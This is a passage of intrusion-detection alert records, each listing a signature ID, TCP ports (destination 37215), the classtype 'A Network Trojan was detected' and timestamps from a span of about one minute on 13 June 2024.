              SID:2829579
              Source Port:42026
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.567846
              SID:2829579
              Source Port:39650
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.725027
              SID:2835222
              Source Port:37934
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.751968
              SID:2829579
              Source Port:43974
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.887608
              SID:2835222
              Source Port:54812
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.841735
              SID:2835222
              Source Port:51162
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.885921
              SID:2829579
              Source Port:44416
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.217222
              SID:2835222
              Source Port:59128
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.039137
              SID:2829579
              Source Port:55020
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.210799
              SID:2835222
              Source Port:55052
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.344210
              SID:2829579
              Source Port:45880
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.356354
              SID:2829579
              Source Port:45038
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.555360
              SID:2835222
              Source Port:57624
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.784649
              SID:2835222
              Source Port:57926
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.042564
              SID:2829579
              Source Port:51460
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.153517
              SID:2829579
              Source Port:46886
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.348262
              SID:2835222
              Source Port:52230
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.345473
              SID:2835222
              Source Port:49030
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.509330
              SID:2835222
              Source Port:52658
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.155436
              SID:2835222
              Source Port:50404
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.193439
              SID:2835222
              Source Port:58690
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.321525
              SID:2835222
              Source Port:51396
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.567520
              SID:2835222
              Source Port:44592
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.300332
              SID:2835222
              Source Port:49148
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.551045
              SID:2835222
              Source Port:51144
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.039261
              SID:2829579
              Source Port:55070
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.567737
              SID:2835222
              Source Port:33024
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.374673
              SID:2835222
              Source Port:60222
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.091961
              SID:2835222
              Source Port:40528
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.547297
              SID:2829579
              Source Port:55598
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.152961
              SID:2829579
              Source Port:33496
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.253699
              SID:2829579
              Source Port:50150
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.269172
              SID:2835222
              Source Port:47720
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.097507
              SID:2829579
              Source Port:59030
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.707823
              SID:2835222
              Source Port:43538
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.243152
              SID:2835222
              Source Port:45150
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.090158
              SID:2829579
              Source Port:38290
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.248395
              SID:2835222
              Source Port:37944
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.176129
              SID:2829579
              Source Port:50002
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.630543
              SID:2829579
              Source Port:48420
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.229929
              SID:2835222
              Source Port:51534
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.158033
              SID:2835222
              Source Port:47980
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.910337
              SID:2835222
              Source Port:53048
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.253499
              SID:2829579
              Source Port:37302
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.016997
              SID:2835222
              Source Port:56262
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.350370
              SID:2835222
              Source Port:45472
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.726494
              SID:2829579
              Source Port:43850
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.990212
              SID:2829579
              Source Port:45064
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.125760
              SID:2829579
              Source Port:42984
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.127573
              SID:2829579
              Source Port:46654
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.158739
              SID:2829579
              Source Port:51360
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.130319
              SID:2829579
              Source Port:52586
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.093818
              SID:2829579
              Source Port:48654
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.608383
              SID:2835222
              Source Port:38948
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.545435
              SID:2829579
              Source Port:41012
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.568897
              SID:2829579
              Source Port:37076
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.869904
              SID:2835222
              Source Port:35622
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.756744
              SID:2829579
              Source Port:49656
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.076521
              SID:2835222
              Source Port:54702
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.419039
              SID:2829579
              Source Port:41312
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.153071
              SID:2829579
              Source Port:59854
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.277763
              SID:2835222
              Source Port:52870
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.359790
              SID:2835222
              Source Port:40578
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.405803
              SID:2835222
              Source Port:53092
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.156977
              SID:2829579
              Source Port:37404
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.176266
              SID:2829579
              Source Port:44300
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.633428
              SID:2829579
              Source Port:35838
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.952368
              SID:2835222
              Source Port:45730
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.095599
              SID:2835222
              Source Port:37446
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.728646
              SID:2835222
              Source Port:59268
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.244117
              SID:2835222
              Source Port:35560
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.132305
              SID:2829579
              Source Port:46246
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.407836
              SID:2835222
              Source Port:60264
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.787264
              SID:2829579
              Source Port:56308
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.223382
              SID:2829579
              Source Port:48834
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.783162
              SID:2829579
              Source Port:34694
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.605334
              SID:2829579
              Source Port:56492
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.023353
              SID:2829579
              Source Port:54972
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.241661
              SID:2835222
              Source Port:37850
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.305342
              SID:2829579
              Source Port:57914
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.754229
              SID:2829579
              Source Port:57694
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.098425
              SID:2835222
              Source Port:42048
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.300352
              SID:2835222
              Source Port:52864
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.908828
              SID:2835222
              Source Port:33242
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.416071
              SID:2829579
              Source Port:44128
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.048149
              SID:2829579
              Source Port:59658
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.106086
              SID:2829579
              Source Port:33574
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.164532
              SID:2835222
              Source Port:47596
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.085734
              SID:2829579
              Source Port:35732
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.231805
              SID:2835222
              Source Port:51792
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.027949
              SID:2835222
              Source Port:41602
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.354023
              SID:2829579
              Source Port:45384
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.670478
              SID:2835222
              Source Port:34376
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.654724
              SID:2829579
              Source Port:52046
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.546848
              SID:2835222
              Source Port:42156
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.045603
              SID:2835222
              Source Port:34146
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.256131
              SID:2829579
              Source Port:37188
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.986618
              SID:2835222
              Source Port:52066
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.728302
              SID:2835222
              Source Port:34422
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.309899
              SID:2835222
              Source Port:36166
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.556275
              SID:2829579
              Source Port:41042
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.347002
              SID:2829579
              Source Port:43508
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.671092
              SID:2829579
              Source Port:45058
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.262194
              SID:2835222
              Source Port:42006
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.012392
              SID:2829579
              Source Port:33238
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.213876
              SID:2835222
              Source Port:45592
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.989291
              SID:2829579
              Source Port:60384
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.974525
              SID:2829579
              Source Port:51724
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.264892
              SID:2829579
              Source Port:58446
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.525875
              SID:2835222
              Source Port:48494
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.275257
              SID:2829579
              Source Port:55302
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.726925
              SID:2835222
              Source Port:39014
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.200163
              SID:2829579
              Source Port:54366
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.525452
              SID:2829579
              Source Port:57628
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.613850
              SID:2829579
              Source Port:43726
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.160377
              SID:2829579
              Source Port:38406
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.177726
              SID:2835222
              Source Port:48724
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.059533
              SID:2835222
              Source Port:56206
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.090200
              SID:2829579
              Source Port:40320
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.196885
              SID:2835222
              Source Port:60522
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.174782
              SID:2829579
              Source Port:55640
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.914267
              SID:2829579
              Source Port:55078
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.154233
              SID:2829579
              Source Port:52822
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.418210
              SID:2835222
              Source Port:49534
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.310005
              SID:2835222
              Source Port:47992
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.263347
              SID:2835222
              Source Port:53494
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.782702
              SID:2835222
              Source Port:51886
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.011845
              SID:2829579
              Source Port:37256
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.158568
              SID:2835222
              Source Port:37936
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.214582
              SID:2835222
              Source Port:56712
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.455167
              SID:2835222
              Source Port:41422
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.136200
              SID:2829579
              Source Port:55946
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.806061
              SID:2829579
              Source Port:36598
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.975366
              SID:2829579
              Source Port:42540
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.266521
              SID:2835222
              Source Port:38734
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.198164
              SID:2835222
              Source Port:53248
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.181001
              SID:2835222
              Source Port:36158
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.172990
              SID:2829579
              Source Port:39496
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.308113
              SID:2829579
              Source Port:41932
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.027536
              SID:2835222
              Source Port:34832
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.263991
              SID:2835222
              Source Port:33644
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.611501
              SID:2829579
              Source Port:46492
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.214238
              SID:2829579
              Source Port:43964
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.304788
              SID:2829579
              Source Port:53450
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.040960
              SID:2829579
              Source Port:34324
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.678281
              SID:2829579
              Source Port:40166
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.611579
              SID:2835222
              Source Port:44418
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.308037
              SID:2835222
              Source Port:34346
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.159608
              SID:2829579
              Source Port:52790
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.305418
              SID:2835222
              Source Port:59122
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.255170
              SID:2829579
              Source Port:54166
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.421051
              SID:2829579
              Source Port:44010
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.570402
              SID:2835222
              Source Port:33982
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.171375
              SID:2835222
              Source Port:50694
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.277257
              SID:2829579
              Source Port:50774
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.458402
              SID:2829579
              Source Port:54394
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.123959
              SID:2829579
              Source Port:36890
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.753493
              SID:2835222
              Source Port:55666
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.754509
              SID:2835222
              Source Port:40610
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.418711
              SID:2829579
              Source Port:35230
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.092220
              SID:2835222
              Source Port:42474
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.502854
              SID:2829579
              Source Port:51262
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.056455
              SID:2829579
              Source Port:43784
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.978892
              SID:2829579
              Source Port:51968
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.655974
              SID:2829579
              Source Port:47722
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.708645
              SID:2835222
              Source Port:35502
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.357601
              SID:2835222
              Source Port:41426
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.525840
              SID:2829579
              Source Port:36710
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.092820
              SID:2835222
              Source Port:37576
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.607394
              SID:2835222
              Source Port:40354
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.100832
              SID:2835222
              Source Port:36742
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.269172
              SID:2829579
              Source Port:37092
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.014690
              SID:2829579
              Source Port:37592
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.567950
              SID:2835222
              Source Port:55264
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.752335
              SID:2835222
              Source Port:45114
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.834861
              SID:2835222
              Source Port:33948
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.165809
              SID:2829579
              Source Port:40538
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.320111
              SID:2835222
              Source Port:32930
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.524874
              SID:2829579
              Source Port:45790
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.218708
              SID:2829579
              Source Port:46454
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.212717
              SID:2835222
              Source Port:59224
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.671711
              SID:2829579
              Source Port:37774
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.610874
              SID:2829579
              Source Port:37028
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.417810
              SID:2829579
              Source Port:49500
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.671110
              SID:2829579
              Source Port:60326
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.279322
              SID:2835222
              Source Port:41140
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.265591
              SID:2835222
              Source Port:32878
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.724647
              SID:2829579
              Source Port:57472
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.504073
              SID:2835222
              Source Port:36640
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.707745
              SID:2835222
              Source Port:42864
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.195689
              SID:2835222
              Source Port:58284
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.800691
              SID:2835222
              Source Port:38480
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.040291
              SID:2829579
              Source Port:41402
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.344807
              SID:2835222
              Source Port:51192
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.272402
              SID:2829579
              Source Port:38816
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.167136
              SID:2829579
              Source Port:42904
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.111621
              SID:2835222
              Source Port:50158
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.564887
              SID:2829579
              Source Port:43414
              Destination Port:37215
